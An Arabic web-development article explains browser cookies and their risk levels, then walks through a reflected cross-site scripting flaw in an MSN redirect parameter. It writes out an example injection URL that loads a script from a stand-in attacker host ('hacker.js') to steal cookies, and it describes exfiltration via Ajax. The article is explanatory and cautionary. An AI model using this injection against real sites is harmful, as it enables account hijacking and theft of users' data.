المشروع - كل ما يتعلق بتطوير المواقع http://www.almashroo.com/

الكوكيز: الحلوى الرقمية

الكوكيز هو ملف نصي له وقت ينتهي، يقوم الخادم بزرعها في جهاز الزبون قصد حفظ بعض المعلومات و المتغيرات لحين استرجاعها أو التعامل معها في اتصال آخر. وتتراوح خطورة الكوكيز إذا تم فتح ثغرة للوصول إليها، من ثغرة لاتشكل أي خطر على الخادم و الزبون إلى درجة خطيرة جدا قد تعصف بمعلومات الزبون، خصوصا إذا كان الكوكيز يعود لموقع بريد مهم ك msn yahoo gmail.

ثغرة لا تشكل أي خطر

عندما يتم الوصول إلى الكوكيز لكن، المعلومات التي تكون مخزنة فيه تكون خاصة بمتغيرات و قيم لها علاقة بالتصميم أو معلومات خاصة بالمتصفح، كأن يحفظ في الكوكيز نوع المتصفح أو طول وعرض الشاشة اوقيم خاصة بطول أو عرض خانة أو صندوق أو متغيرات خاصة بالجافاسكريبت، أو عداد لإظهار نافذة منبثقة مرة كل ثلاث أيام مثلاً.

فهنا ان تم الوصول و التحكم في الكوكي فإنه لا يشكل أي خطر على صاحب السيرفر(الخادم) و صاحب الجهاز(الزبون).

ثغرة متوسطة

هي الثغرة التي ان تم الكشف و الوصول إلى الكوكيز يكون المتضرر الوحد هو العميل، كأن يعتمد في الكوكيز على الإحصائيات أو تخزين رقم ال IP أو بعض المعلومات عن الزبون قصد الإستفادة منها أو ليقيم به موقعه، أو معلومة يتذكر بها الجهاز ليضع إعلانات غير مكررة مثلاً ان ثم الوصول و التلاعب في الكوكي، فلن يتضرر الزبون بل صاحب الصفحة هو من سيحصل له إختلال في المعلومات، التي يستجديها من جهاز الزبون.

ثغرة عاصفة

هي التي يكون فيها الكوكيز مخزن لبعض المعلومات الحساسة ككلمة المرور و كلمة السر وبعض القيم التي ان تغيرت يتم تغيير في قاعدة بيانات العميل تكمن الخطورة هنا ان تم الكشف عن ذاك الكوكيز، فإن مكتشف أو المتلاعب بالكوكيز هنا ستكون له الأولوية على بريدك أو حسابك والمتضرر هنا بالدرج الأولى هو الزبون الذي ستتعرض مصالحه للخطر.

هذه الثغرات كلها غير واردة الا إن كان المبرمج في تعامله مع الكوكيز لم يؤمنها، والتأمين هنا ليس في حماية الكوكيز نفسه أو إعلاق الأبواب الخلفية، بل في جعل البرمجة لا تقبل وسوم خارجية أو تحكم خارجي في الكوكيز(أي من خارج الموقع، لأن الكوكيز يتعرف على الموقع من الإمتداد الجدري)، حتى أن من خوف بعض مبرمجي ال php من الكوكيز يلتجئ إلى الجلسات ثم الجلسات ولا حلوة صغيرة (cookie).

المأزق

الثغرة الأخيرة التي ذكرت والتي ان ثم توضيفها جيدا وكان للموقع رواجا كبيرا و مصالح للناس فيه، خصوصا ان كان بريد إلكتروني فإن بهذه الثغرة قد تعرضت عورات بريدهم للكشف لغيرهم كما حدث ومازال يحدث مع العملاق المتقزم(بسبب هذه الثغرة) ال msn أساس مشكلة ثغرة الكوكيز في ال msn سأحاول تقريبها بال php هذه الصفحة سنلاحظ انه يوجد بها متغير $RE هذا المتغير يأخد القيمة من العنوان.

Unless your browser has scripting disabled, you should be returned to the
page you were at in a couple seconds.  Otherwise, please click
<a href="$RE"><strong>here</strong></a>
to return manually.

أي إن كان العنوان هكذا

<a href="http://www.xxx.msn.com?RE=www.almashroo.com" target="_blank">www.xxx.msn.com?RE=www.almashroo.com</a>

فإن ناتج الصفحة سيكون هو

Unless your browser has scripting disabled, you should be returned to the
page you were at in a couple seconds.  Otherwise, please click
<a href="www.almashroo.com"><strong>here</strong></a>
to return manually.

أين المشكل إذا؟

المشكلة يبدوا ان مبرمج هذه الصفحة حين برمجته لها أكل من كبدة منسية 5 أيام حيث جعل اية قيمة يحملها المتغير RE تطبع في الصفحة دون مرورها من دوال للتحقق من مصداقيتها.

ماذا يعني هذا؟

يعني ان المتغير يقبل الوسوم!

يكفي ان يكون مبرمج ذو بال حتى يقحم بعض الوسوم الحساسة، كأن يغلق وسم الرابط ليفتح وسم استدعاء السكريبت، وان تم له ان يستدعي ملف جافاسكريبت من داخل الوسم من جهازك فإنه بدالة document.coockie يعرف الكوكي كله الخاص بال msn طالما ان الموقع الجدري هو الذي يستدعيى السكريبت الفرعي، وهذا مثال مبسط ان كان الرابط.

http://www.xxx.msn.com?RE=#"><script src="http://www.xxx.com/hacker.js"></script>< a href=

بعد تحويل قيمة RE إلى نسب مؤية عن طريق الدالة escap حتى لا يقع تعارض بين الرموز البرمجية و النصوص العادية فإن الناتج عن هذه الصفحة هي.

Unless your browser has scripting disabled, you should be returned to the
page you were at in a couple seconds.  Otherwise, please click
<a href="#"></a><script src="http://www.xxx.com/hacker.js%20"></script><strong>here</strong>
to return manually.

معناه ان صفحة ال msn إستدعت ملف السكريبت.

<a href="http://www.xxx.com/hacker.js" target="_blank">http://www.xxx.com/hacker.js</a>

وهذا الملف الله وحده يعلم مايمكن ان يوضع فيه وما يمكن ان ينتج عن هذه الثغرة.

• الكوكيز ممكن سحبه بسهولة و غرساله عن طريق تقنية أجاكس دون ان تدري.
• كما يمكن ان يعدل لك في الكوكيز بما يناسبه.
• حقيقة ان أغلب كلمات السر التي تكون محفوظة في الكوكيز تكون مشفرة على وزن MD5 لكن يمكنه ان يلج لحسابك و في حسابك توجد كلمات مرور و أسرار أخرى.
• أن يضع لك أكواد ActiveX معلوم انه هناك اوامر لا تتعدى سطرين يمكن ان تعدل في قاعدة الروجيستر الخاصة بجهازك، وان وصل إلى الروجستر فبإمكانه ان يجعلك عندما تريد ان تدخل إلى hotmail يحولك مباشرة إلى موقعه أو يستدعي لك صورة أو لعبة في صفحة ال msn.

حقيقة تخرج رسالة تحذير انك ستعدل على ملفات النظام، لكن هناك من لا يعرف اصلا ماهو أكتف إكس، اوكي أو خلاص.

أين يكمن الخطر

الخطر يكمن في انك لا تعرف الصفحة الملغومة وللأسف فايرفوكس بنفسه تمر عليه الحيلة (لأن الثغرة ليست ثغرة المتصفح) حيث يمكن ان يعطيك أحد رابط عادي لموقع معين أو صفحة معينة حين الدخول إليها لا تكاد تعد في نفسك لغاية 3 حتى يكون انسحب من الكوكي ولا من شاف ولا من دري النقرة الأولى تقوم بتحويلك مباشرة إلى الرابط الملغوم المرة الثانية يتم سحب الكوكي من الضحية و إرساله الهكر المرة الثالثة من خلال كود اللجافا الذي أحد منك الكوكيز هو نفسه بعد انتهاء العملية يعيدك إلى الصفحة التي يريد ان يريها لك يني ان قال لك إليك موقع اخباري مثلاً فإنك ستمر عبر مرحليتن ثم المرحلة الثالثة هي التي تفتح لك موقع الأخبار، كل هذا في أقل من 3 ثواني.

المخرج

هو في مراسلة ال msn بهذه الثغرة رغم انها أقرت بها كم مرة ولم ترقعها و لا مرة أو تعليق خدمة ال msn إلى أجل مسمى.